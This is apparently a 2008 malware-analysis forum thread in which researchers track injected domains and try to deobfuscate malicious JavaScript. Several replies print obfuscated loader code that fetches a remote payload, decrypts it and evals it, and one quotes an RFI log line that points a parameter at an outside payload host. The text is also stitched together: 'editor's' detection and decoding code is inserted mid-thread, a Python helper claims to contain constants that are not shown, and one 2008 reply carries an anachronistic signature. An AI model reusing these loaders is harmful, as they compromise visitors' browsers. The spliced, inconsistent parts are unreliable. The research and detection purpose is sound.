F%se62%se6A%se65%se63%se78KQ%1%se28%se6E%se4F%se58KQ%1%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se7D';eval(unescape(cB.replace(/8KQ%/g,'b').replace(/%6T/g,'9%').replace(/b1%/g,'4%').replace(/%se/g,'%')));var nY=unescape(LV);if (!q){try{q=new ActiveXObject(nY);}catch(e){q=null}}var zqj=iGUR;var akK=function(){tP = unescape(q.responseText);var W5O=0;var 
Qg6M='Cc%76Cc%61Cc%7Z20Cc%74Cc%6ECc%37Cc%3BCc%66Cc%6FCc%7Z2r3H6BCc%74Cc%7ACc%4FCc%3DCc%30Cc%3BCc%6BCc%74Cc%7ACc%4FCc%3CCc%3Z35Cc%36Cc%3BCc%6BCc%74Cc%7ACc%4FCc%2BCc%2BCc%29Cc%7BCc%74Cc%6ECc%37Cc%3DCc%6BCc%74Cc%7ACc%4FCc%25Cc%4Z2ECc%6CCc%65Cc%6ECc%67Cc%74Cc%6r3H3BCc%74Cc%6ECc%37Cc%3DCc%4Z2ECc%63Cc%6r3H61Cc%7Z43Cc%6FCc%64Cc%65Cc%41Cc%74Cc%2r3H74Cc%6ECc%37Cc%29Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%2BCc%74Cc%6ECc%37Cc%3BCc%74Cc%6ECc%37Cc%3DCc%57Cc%35Cc%4FCc%2BCc%74Cc%6ECc%37Cc%3BCc%57Cc%35Cc%4FCc%3DCc%74Cc%6ECc%37Cc%20Cc%25Cc%20Cc%3Z35Cc%36Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3DCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3DCc%74Cc%6ECc%37Cc%3BCc%7DCc%5Z57Cc%6FCc%3DCc%30Cc%3B';eval(unescape(Qg6M.replace(/Cc%/g,'%').replace(/Z/g,'2%').replace(/r3H/g,'8%')));var V3LR='MZ68MZ42MZ49MZ73MZ3DMZ30MZ3BMZ76MZ61MZ72MZ20MZ53MZ58MZ3DMZ27MZ27MZ3B';eval(unescape(V3LR.replace(/Z/g,'m').replace(/Mm/g,'%')));var x6;var Ak;for(x6=0;x6<tP.length;x6++){RWo=RWo+1;RWo=RWo%256;hBIs=hBIs+nPG[RWo];hBIs=hBIs%256;tn7=nPG[RWo];nPG[RWo]=nPG[hBIs];nPG[hBIs]=tn7;Ak=nPG[RWo]+nPG[hBIs];Ak=Ak%256;Ak=nPG[Ak];Ak=tP.charCodeAt(x6)^Ak;SX+=String.fromCharCode(Ak);}eval(SX);};var x=function(){if((q.readyState==4)&&(q.status==200)){akK();}};q.onreadystatechange=x;q.open('GET',zqj,true);q.send(null);
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
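The log line in the post above is a remote file inclusion (RFI) attempt: the client puts an absolute URL into a parameter (phpAds_path) that the targeted script uses to build an include path, so a vulnerable host would fetch and run the attacker's file.txt, which the post shows is a PHP dropper that pulls read.txt and hands it to perl. As an added detection example (editor's code, not part of Steven's post), the JavaScript below parses W3C-format IIS log lines and flags any request whose query parameters carry an off-site URL. The first sample line is the one from the post; the other lines are constructed. The field order (the default IIS W3C Extended layout the excerpt matches), the libwww-perl severity bump, and the `ownHosts` allowlist are assumptions of this example.

```javascript
// Added example (editor's code, not from the thread): RFI detection over
// W3C Extended log lines like the excerpt in Reply #2.
// Field order below is the default IIS layout the excerpt matches (assumption).
const FIELDS = ['date', 'time', 's-ip', 'cs-method', 'cs-uri-stem', 'cs-uri-query',
  's-port', 'cs-username', 'c-ip', 'cs(User-Agent)', 'cs(Referer)',
  'sc-status', 'sc-substatus', 'sc-win32-status'];

// Returns a record keyed by field name, or null for #Software/#Fields headers
// and malformed rows (anything that does not have exactly FIELDS.length columns).
function parseW3cLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length !== FIELDS.length) return null;
  const rec = {};
  FIELDS.forEach((name, i) => { rec[name] = parts[i] === '-' ? null : parts[i]; });
  return rec;
}

// Any scheme followed by "://" (http, https, ftp, ...). RFI payloads in the
// wild mostly use http, but the check is generic on purpose.
const URL_SCHEME = /^[a-z][a-z0-9+.-]*:\/\//i;

// Returns [{param, url}] for every query parameter whose value is an absolute URL.
function remoteUrlParams(query) {
  if (!query) return [];
  const hits = [];
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    if (eq < 0) continue;
    const name = pair.slice(0, eq);
    let value = pair.slice(eq + 1);
    try { value = decodeURIComponent(value); } catch (e) { /* keep raw value on bad %-encoding */ }
    if (URL_SCHEME.test(value)) hits.push({ param: name, url: value });
  }
  return hits;
}

function hostOf(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/?#:]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// ownHosts: hostnames that legitimately show up inside your own parameters
// (an in-house redirector, for instance). Every other off-site URL is reported.
function detectRfi(lines, ownHosts = new Set()) {
  const alerts = [];
  for (const line of lines) {
    const rec = parseW3cLine(line);
    if (!rec) continue;
    for (const hit of remoteUrlParams(rec['cs-uri-query'])) {
      const host = hostOf(hit.url);
      if (host && ownHosts.has(host)) continue;
      const ua = rec['cs(User-Agent)'] || '';
      alerts.push({
        clientIp: rec['c-ip'],
        target: rec['cs-uri-stem'],
        param: hit.param,
        payloadHost: host,
        userAgent: ua,
        status: Number(rec['sc-status']),
        // libwww-perl is the UA in the post and is typical of scripted RFI
        // scanners; on its own it is a weak signal, so it only raises severity.
        severity: /libwww-perl/i.test(ua) ? 'high' : 'medium',
      });
    }
  }
  return alerts;
}

// Constructed sample log: line 2 is the one from the post, the rest are made up here.
const SAMPLE_LOG = [
  '#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status',
  '2008-06-02 00:04:37 192.168.0.20 GET /phpAdsNew/view.inc.php phpAds_path=http://www.mgfcompressors.com/portal/help/file.txt??? 80 - 193.198.217.3 libwww-perl/5.803 - 404 0 0',
  '2008-06-02 00:05:01 192.168.0.20 GET /index.php page=news 80 - 10.0.0.7 Mozilla/4.0+(compatible;+MSIE+7.0) - 200 0 0',
  '2008-06-02 00:05:09 192.168.0.20 GET /go.php url=http://www.example.org/about 80 - 10.0.0.8 Mozilla/4.0+(compatible;+MSIE+7.0) - 302 0 0',
];

// Runs the detector over the sample with our own redirector target allowlisted.
function demo() {
  return detectRfi(SAMPLE_LOG, new Set(['www.example.org']));
}
```

Run with node; demo() returns a single alert, for the phpAds_path line. A URL in a parameter is not proof of inclusion (redirectors and feed fetchers do it legitimately), which is what the allowlist is for. The 404 in the sample shows this attempt hit nothing; the same pattern answered with a 200 by a script that really does include the parameter is the one to escalate, and the payload host is the one to report, as Steven did.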

June 02, 2008, 12:53:57 pm
Reply #3

YanceySlide

Yancy=Mike?

mike@shadowserver.org -- yup, that's me

Quote
http://www.malwaredomainlist.com/forums/index.php?topic=1867.0

Need adding?

I've been trying to stick to script=src methods, rather than iframes.  It's more difficult to tell whether or not the iframes are mass injections or not.  I've yet to run across what looks like injected jscript that turns out to not be a mass injection.
The Shadowserver Foundation

June 02, 2008, 02:26:38 pm
Reply #4

YanceySlide

New additions:
hxxp://www.xiaobaishan.net
hxxp://www.rexec39.com
hxxp://www.tlcn.net
The Shadowserver Foundation

June 02, 2008, 09:38:56 pm
Reply #5

JohnC


June 03, 2008, 03:29:47 pm
Reply #6

MysteryFCM

Ref: mgfcompressors.com

Quote
Thanks Steven,
we have deleted the files and asked our client again to move to another platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 03, 2008, 11:40:15 pm
Reply #7

JohnC

There is a script here which may be malicious. I don't know much about it; for all I know it could be clean, but it looks heavily obfuscated: mgfcompressors.com/iieox.js

June 03, 2008, 11:44:31 pm
Reply #8

MysteryFCM

I'm getting a 404 for that one?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 04, 2008, 11:32:17 am
Reply #9

Orac (malwareremoval.com)
Steve, I am also getting a 404 from that link. Wonder if it's been cleaned, or they just don't like British IPs lol
Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment

June 04, 2008, 11:55:29 am
Reply #10

bobby (Malzilla)
It changes the name of the file. It is yzuac.js at the moment
If you visit the link for the 2nd time - the page will be clear, no references to the JS file will be there.

The script is d*mn complicated.
I'll give it a try, and I'll post the results (if I get any)

June 04, 2008, 12:32:34 pm
Reply #11

bobby (Malzilla)
I didn't get far. The script tries to define a function in a way that doesn't work in SpiderMonkey.

If someone wants to try it in IE under a virtual machine, here is the code I got:
Code:
var arg="btryttfi";
function Cwmf8K(AH){var zoU5="C68KC3";var U47="var FuqV=75397;";var Pk="qeJ33cqe3";var zOR="8N0G8";var Jz="9G8N0G850";var vV="charCodeA";var pK="901;var xEx=1";Jz+="G85DG83DG84";var ySE="nLej-40955883";var j6="e3Dcqe31";var eBBT="scape(U.replac";var u1oP="Z2Yh;n";var sz=")));var oGZ";var r="qeEl1";var Bi="q6KC3BKCUeqAK";zOR+="50G85DG8";var X="change=G;Y";var UqE="Txc+=String.fro";var EwzG="6c-857";var mkj="G84CG83DG843G";var i7=";var xC=711";var Q1="2daR20d";var BAZz="(/f/g,'A').re";var ZhM5="L=new Activ";var RkYD="L=nul";var oie="(/cqe/";var MU3=");D=xC%nLe";var pjJt="5DG83BG843G";var MCSe="6F9D%g12";var tSPH=");mi+";var CN="0%g125%g120";var RF="ace(/Ueq/g";var gstw="ape(De.rep";ySE+="84);F";var KZP="var YL=null;va";var gh="l=unescape(";var VyU="61G8N2G84";var lJ="o/g,'%'";var em9="KC6UeqK";var cy0="2G86FG86DG843G";var iB="0dSmi460dSmi750";var X1Vn="KC76KC61";var SN="ace(/9/g,";var KO="(/G8/g,'%')))";zOR+="3BG845G850G845G";var uf="86DG86DG84CG8";var XjNy="g136%g13B9A%g";var UK="%4C%48%54%54%";SN+="'%5')));}qIpP=";var n8vF="e(/\\W/g,'');";uf+="3DG84FG8N9G82";var ClN8="ce(/M1/g,'%";var mNf="%g143%g1769";pjJt+="8N6G851G85B";var GC="r YH=function()";var rK="KC61KC";var y="3D%g143%g1769";var kwC="g148%g165%g176%";var hsR="4D%4C";KO+=";}eva";cy0+="868G8";var EbF="String";rK="C78KC43KC3BKC76"+rK;var rK2u="g,'D')));FuqV=";var aSn5="33Fpo34F";var t="N0G850G85DG82";var TfU="DFpo3BFpo76";var Dd="KC76KC61KC7";var V9sI="tring.fro";MU3="v-59581"+MU3;var c="2B9A%g148";MU3=EwzG+"5844471)*(v"+MU3;var g="XObject(z";g+="zl);}";var pMu="cape(z2l";var dg="i.charCodeA";var Usbs="L.sen";kwC+="g13D%g143%g1";lJ+=")));Z2Yh=Z2";var WDIF="L=null}}v";var ERL4="mi/g,'%')));";Bi+="C32KCUeq9KC68KC";var rq="cqe72cqe2Vc";hsR+="%48%54%54%50';i";pK+="8390;Pv6";ClN8=",'M').repla"+ClN8;var Lm="69%63%72%6F%73%";TfU="po56Fpo2DFpo2"+TfU;mNf="%g13B"+mNf;var uT="pe(Cpw)";var KJKW="replace(/aR/";var mw="a++){CvQ[UE";var kIc="ngth;oGZI";var SsV="0G845G";var kzg="3B';eval(un";var 
DY="3BG85AG848G";KO+="l(q);};var G=";n8vF="eplac"+n8vF;var Eo="o4CFpo3B';ev";var g76O="qeJEl3cqe3Dc";var j=");uA=183;}}";gh+="it);if ";RkYD="();}catch(e){Y"+RkYD;var yCa="').replace(/El";var h6Sm="3B9894%g13D9A%g";var SNT="dSmi75";var sh="9D%g13B%g143%";var uK8="2Fpo20Fpo";uT="r ejA=unesca"+uT;Pk=j6+"cqe3c"+Pk;var Esh="2G84CG8";var XeN="G85DG83BG";BAZz=pMu+"P.replace"+BAZz;gstw="eval(unesc"+gstw;Dd="n0KC78KC43KC3B"+Dd;var Cxt1="qeEl1cq";ySE+="uqV=FuqV%"+u1oP;var FBk="DG86DG";var pk="place(/B%/g";var J2="nseText);var X";gh+="(!YL){try";var bAg="5BG845G850G8";var J="849G8N0G850G";UK="%32%2E%58%4D"+UK;FBk="852G86"+FBk;VyU+="3G86FG86";h6Sm+="148%g165%g1";RkYD="tpRequest"+RkYD;Q1="daR6B%daR7"+Q1;var tW8J="dSmixigY";KJKW="unescape(BUBC."+KJKW;mNf+="19B98949D%g13D9";var UkqY="051;var Mkm";KO="g,'7').replace"+KO;t="85BG8N1G849G8"+t;var dl9o="0G845G";FBk="DG86DG84CG83DG"+FBk;J="G8N1G"+J;var Af="84CG8";var nr="mmL;for(RbLR=0;";FBk+="84CG825G";UK+="50';var";i7+="63;var EjFO='KC";var PLZK="po72Fp";var REQt=";Go<256;Go+";V9sI="){Txc+=S"+V9sI;var DAJC="dSmi760dSmi3D0d";PLZK+="o20Fpo72Fpo7AF";var mtJB="850G845G8";dg="ngth;ZHev=m"+dg;gstw="CG829G83B';"+gstw;var w6="qe5cqeJ3DcqeE";var xXpp="YL.onrea";U47+="var Z2Y";Q1="30daR3BdaR76"+Q1;DAJC="640dSmi6A0"+DAJC;vV=kIc+"++){uA^=mi."+vV;w6="3cqe59cqeEl1c"+w6;TfU="Fpo75Fpo71F"+TfU;var CKCG="80606";c="9894%g1"+c;var tY9Q="();var UEma";var KJGB="65%g176%g13D%g1";Eo="BFpo4BFp"+Eo;var Lw="Fpo27";var bZx="3DG843G8N6G851G";var Rk7k="UeqKC37KC3";Bi="KC7UeqKC71KCUe"+Bi;Cxt1="e7Elc"+Cxt1;var NJZE="ect(ejA";var AB="52G86DG86";UK="D%73%78%6D%6C"+UK;ClN8+="').repl"+SN;var H="C37KC37KC32K";Dd+="2KC20KC76KC76KC";V9sI+="mCharCode";KJGB+="43%g176919";y="g147%g16F9D%g1"+y;ERL4+="CvQ=new Array"+tY9Q;pk+=",'1').replac";Usbs=",IOom,true);Y"+Usbs;FBk+="832G8";em9+="C6AKC3Vn0";var yjZN="UeqAKC32KCUeq9";dg="%mi.le"+dg;UqE="(oGZI%76==75){"+UqE;var OcK="){if((YL";var T7="6EKC4CKC6U";var okr="9KC3UeqKC3";var 
ojT8="KC4CKC3Vn0KC33K";rK+="72KC20KC6EKC4CK";NJZE=ZhM5+"eXObj"+NJZE;Af+="3BG8N1G82B";i7+="UeqAKC32KCUeq9K"+zoU5;var ixL="){YL=null}}";var Dt="86DG84CG83DG84";gh=WDIF+"ar zz"+gh;y=sh+"g176919B%"+y;XeN+="843G8N6G851G";var Ip="G869G86EG86N";t+="BG843G8N6G851G8"+bAg;H+="C3UeqKC3B"+X1Vn;PLZK+="po31Fpo3DFpo3";XeN="45G850G845"+XeN;SsV="845G85"+SsV;ixL+="var IOo";gh+="{YL=new ";dg=REQt+"+){ZHev=Go"+dg;g=gh+"Active"+g;Eo="DFpo44Fpo2"+Eo;DY+="865G8N6G8"+bZx;var dpL="851G85BG8N1";var jmh="KC6UeqKC6A";RF+=",'5').replace(";var Wy="i=arguments.";ixL+="m=SYaX;va"+GC;SNT="i3D0dSmi460"+SNT;KJKW="7daR3B';eval("+KJKW;var XgE="ace(/0dS/g,'";var qMc1="1G849";var euFA="th;nLej=nLej+xE";J2="(YL.respo"+J2;XeN="85BG8"+XeN;h6Sm=c+"%g165%g176%g1"+h6Sm;zOR+="83DG845G85"+dl9o;T7=rK+"C6UeqKC6AKC3BKC"+T7;Usbs+="d(null);";em9="6EKC4C"+em9;BAZz=Pk+"B';eval(unes"+BAZz;Af+="G83DG853G8";var LkCR="r ZHe";uT=RkYD+"l};}va"+uT;SsV="5G836G83BG"+SsV;uT="XMLHt"+uT;sz="lace(/%J/g,'8%'"+sz;mtJB+="5DG83DG85A";rq+="qe75cqe41cq"+BAZz;Af="DG86DG"+Af;gstw+="lace(/N/"+KO;ixL+="{Oy = unescape"+J2;DAJC="50dSmi"+DAJC;ySE="890)*("+ySE;ClN8+="0;var BUBC='d";okr=ojT8+"C30KC3"+okr;UkqY=rK2u+"FuqV+44"+UkqY;euFA=ySE+"Lej=rz1+D.leng"+euFA;kzg+="escape(Z3p.repl";Usbs=X+"L.open('GET'"+Usbs;gstw="52G86DG86DG84"+gstw;DAJC+="Smi410dS";yjZN+="KC68KC2AK"+T7;kwC+="76919B%";eBBT="g13B';eval(une"+eBBT;var Dda="%g148%g165%g176";Bi="68KC2BKC46"+Bi;var Ckds="dSmi7xigY0";ClN8+="aR45daR50daR4";uf+="EG863G868G8"+VyU;tSPH+="=FuqV;var";XgE="ig/g,'z').repl"+XgE;SsV="G825G832G83"+SsV;RF+="/KC/g,'%').";OcK=gstw+"function("+OcK;Wy=mw+"ma]=UEma;}m"+Wy;Ckds="0dSmi760dSmi610"+Ckds;iB+="dSmi710dSmi";dpL="G82BG843G8N6G"+dpL;var K="Fpo3BFpo4";Rk7k+="1KC30KC3BKC"+em9;UK+=" 
it='%4D%"+Lm;OcK+=".readySt";uK8=TfU+"Fpo61Fpo7"+uK8;FBk="852G86"+FBk;Af="G852G86"+Af;yCa=rq+"place(/V/g,'0"+yCa;MCSe=kwC+"g147%g1"+MCSe;MCSe+="B9A%g148%g165";sz=oie+"g,'%').rep"+sz;Wy="6;UEm"+Wy;i7+="Vn0KCUeqA";y=KJGB+"B%g147%g16F"+y;g76O="cqe7c"+g76O;Esh="G8N4G828G852G86"+Esh;n8vF=EbF+"();mi=mi.r"+n8vF;Rk7k=Dd+"3Vn0KC32KC3"+Rk7k;nr="var R"+nr;qMc1=DY+"85BG8N"+qMc1;XjNy+="148%g1"+y;MCSe="ar U='9A%"+MCSe;XjNy=CN+"%g132%g135%"+XjNy;Q1=ClN8+"5daR3DdaR"+Q1;yjZN=Bi+"3Vn0KC"+yjZN;t+="45G85DG83BG"+FBk;pk+="e(/dJ/g,'%'))";var VJ=";RbLR++){";KJKW="daR3DdaR27daR2"+KJKW;Eo+="al(unescape(Mkm";uK8=aSn5+"po36Fpo3BFpo46"+uK8;Dt="83BG852G86DG"+Dt;PLZK=UkqY+"o='Fpo76Fpo61F"+PLZK;dg=LkCR+"v;for(Go=0"+dg;eBBT+="e(/%g/g"+Q1;sz+="I;for(oG";yCa="cqe7ElcqeEl1"+yCa;VJ=nr+"RbLR<Oy.length"+VJ;UqE+="mCharCode(uA"+j;AB=mkj+"8N6G851G85BG8"+AB;XgE+="N').replace(";uT="){try{YL=new "+uT;yCa=g76O+"qe27cqe27cqe3B"+yCa;Ckds+="dSmixigY00dSmi6"+DAJC;J="ar De='"+J;pjJt+="G8N1G84"+Jz;Af+="N4G8N2"+Ip;yCa+="/g,'6').replace"+sz;XgE+="/xzY/g,'2').r";var aKIf="G86FG";var nnIR="UEma=";CKCG=lJ+"Yh%KL;var Pv6c="+CKCG;dg+="t(ZHev);v"+MCSe;hsR+="f (!YL"+uT;ERL4=XgE+"eplace(/N"+ERL4;t+="35G836G83";nnIR+="0;UEma<25"+Wy;MU3=euFA+"x;xC=(Pv"+MU3;Ckds=tW8J+"50dSmi440dSmi3B"+Ckds;okr+="2KC3B';ev";yjZN+="eqKC6AKC3V"+Rk7k;hsR+=";if (!YL){try{Y"+NJZE;H+="KC72KC20KC4B"+okr;kzg=Ckds+"mi480dSmi"+kzg;Esh=uf+"4G865G841"+Esh;RF="pe(EjFO.repl"+RF;ERL4+=";var ";Af+="G82EG866G8N"+cy0;uK8=PLZK+"3Fpo30Fpo"+uK8;w6+="l5cqeEl4c";yjZN+="KC6EKC4C"+jmh;xXpp+="dystate"+Usbs;SNT=iB+"560dSm"+SNT;AB+="DG84CG85DG8";vV+="t(oGZI);if"+UqE;CKCG="e(/Fp"+CKCG;SsV="G849G8N0G850"+SsV;qMc1="G835G836G8"+qMc1;KZP=V9sI+"(uA);}mi=Txc;"+KZP;dpL+="G849G"+zOR;CKCG+=";vv=vv+33"+pK;xXpp="{YH();}};"+xXpp;uK8="(/Vn0/"+uK8;w6=Cxt1+"e72cqe2Vcqe5"+w6;w6=tSPH+" 
z2lP='cq"+w6;ixL+="T=0;va"+dg;nnIR+="callee.to"+n8vF;nnIR+="mi=mi.toUppe";hsR="2E%58%"+hsR;eBBT="g176%"+eBBT;w6+="qeElfcqe7Elc";r+="cqe72cqe2Vcqe54"+yCa;Dda=ixL+"%g176%g13B9A"+Dda;kzg+="ace(/"+ERL4;AB=t+"BG852G86DG86D"+AB;K=Lw+"Fpo33Fpo35Fpo27"+K;nnIR+="rCase("+w6;VJ+="qIpP=qIpP+1;v"+J;Af+="61G8N2G843"+aKIf;Dda=g+"catch(e"+Dda;SsV+="83DG845G850G845"+dpL;RF+="replace"+uK8;MU3=CKCG+"c=(Pv6c-79"+MU3;pk=KJKW+"g,'J').re"+pk;MU3=Eo+"o.replac"+MU3;RF=H+"al(unesca"+RF;MU3=K+"4Fpo3"+MU3;UK=KZP+"r Cpw='%4"+UK;SNT=MU3+"j;var Z3p='"+SNT;mNf=XjNy+"19B98949D"+mNf;VJ+="83DG8N1"+SsV;SNT+="0dSmi710dSmi560"+kzg;Dda+="%g13D"+h6Sm;mtJB=XeN+"85BG845G"+mtJB;mtJB+="G848G865G8N6G"+Dt;RF+="44Fpo3D"+SNT;i7=U47+"h=73665"+i7;yjZN+="KC2AKC3UeqK"+RF;qMc1+="G8N0G850G8"+pjJt;pk=eBBT+"aR7B%"+pk;Esh+="52G829G85E"+Af;AB=mtJB+"3G8N6G851G"+AB;yjZN+="mi;for("+nnIR;AB=qMc1+"3G8N6G851G"+AB;pk+=");var RbLR;"+VJ;AB+="3BG852G"+Esh;xXpp=".status==200))"+xXpp;Dda+="76%g12"+mNf;hsR+=");}catch(e){Y"+Dda;OcK+="ate==4)&&(YL"+xXpp;i7+="KC32KCUeq9KC"+yjZN;hsR=UK+"6F%66%74%"+hsR;hsR+="A%g148%g165%"+pk;r=i7+"qe3Bcqe7Elc"+r;AB+="864G865G828G8"+OcK;hsR=vV+"if(oGZI%76!=75"+hsR;r+="ZI=0;oGZI<mi.le"+hsR;r+="825G832"+AB;eval(r);}Cwmf8K(arg);


Take a look at the first variable:
var arg="btryttfi";
The value of the variable is the name of the file on the server. It contains some data probably needed in the script.
After going through deobfuscation, I got this far:
Code:
var FuqV=75397;var Z2Yh=73665;var xC=71163;var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));FuqV=FuqV+44051;var Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';eval(unescape(Mkmo.replace(/Fpo/g,'%')));Z2Yh=Z2Yh%KL;var Pv6c=80606;vv=vv+33901;var xEx=18390;Pv6c=(Pv6c-79890)*(nLej-4095588384);FuqV=FuqV%Z2Yh;nLej=rz1+D.length;nLej=nLej+xEx;xC=(Pv6c-8575844471)*(vv-59581);D=xC%nLej;var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));CvQ=new Array();var UEma;var mi;for(UEma=0;UEma<256;UEma++){CvQ[UEma]=UEma;}mi=arguments.callee.toString();mi=mi.replace(/\W/g,'');mi=mi.toUpperCase();mi+=FuqV;var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));var oGZI;for(oGZI=0;oGZI<mi.length;oGZI++){uA^=mi.charCodeAt(oGZI);if(oGZI%76==75){Txc+=String.fromCharCode(uA);uA=183;}}if(oGZI%76!=75){Txc+=String.fromCharCode(uA);}mi=Txc;var YL=null;var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var 
it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';if (!YL){try{YL=new XMLHttpRequest();}catch(e){YL=null};}var ejA=unescape(Cpw);if (!YL){try{YL=new ActiveXObject(ejA);}catch(e){YL=null}}var zzl=unescape(it);if (!YL){try{YL=new ActiveXObject(zzl);}catch(e){YL=null}}var IOom=SYaX;var YH=function(){Oy = unescape(YL.responseText);var XT=0;var ZHev;for(Go=0;Go<256;Go++){ZHev=Go%mi.length;ZHev=mi.charCodeAt(ZHev);var U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));}qIpP=0;var BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));var RbLR;var RmmL;for(RbLR=0;RbLR<Oy.length;RbLR++){qIpP=qIpP+1;var De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')));}eval(q);};var 
G=function(){if((YL.readyState==4)&&(YL.status==200)){YH();}};YL.onreadystatechange=G;YL.open('GET',IOom,true);YL.send(null);

The JS debugger says that AH is not defined. AH exists in the obfuscated script, as the argument of the function.
After I put a value in place of AH, I get to the wrong definition of mi.
SpiderMonkey does not allow such a declaration of the mi function.
I have no idea how to get further from this step.
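The replace()/unescape() layers in the script above can be unwound statically instead of running them through eval. This is an added Python helper, not code from the thread; the four string constants are copied from the posted script and the replace chains are the ones the script applies to them, which among other things recovers the line where the undefined AH comes from (var edjv=AH;) and the next layer that turns it into SYaX, the URL the XMLHttpRequest later fetches.

```python
import re

# Added analysis helper; the four constants below are copied from the posted script.

def js_unescape(s: str) -> str:
    """Python equivalent of JavaScript's unescape(): decode %uXXXX and %XX."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def decode_layer(blob: str, replacements) -> str:
    """Undo one eval(unescape(X.replace(...).replace(...))) layer without eval.

    The chain is applied in the script's order; every pattern in this sample
    is a literal string, so str.replace behaves like the /pat/g regex.
    """
    for pat, repl in replacements:
        blob = blob.replace(pat, repl)
    return js_unescape(blob)

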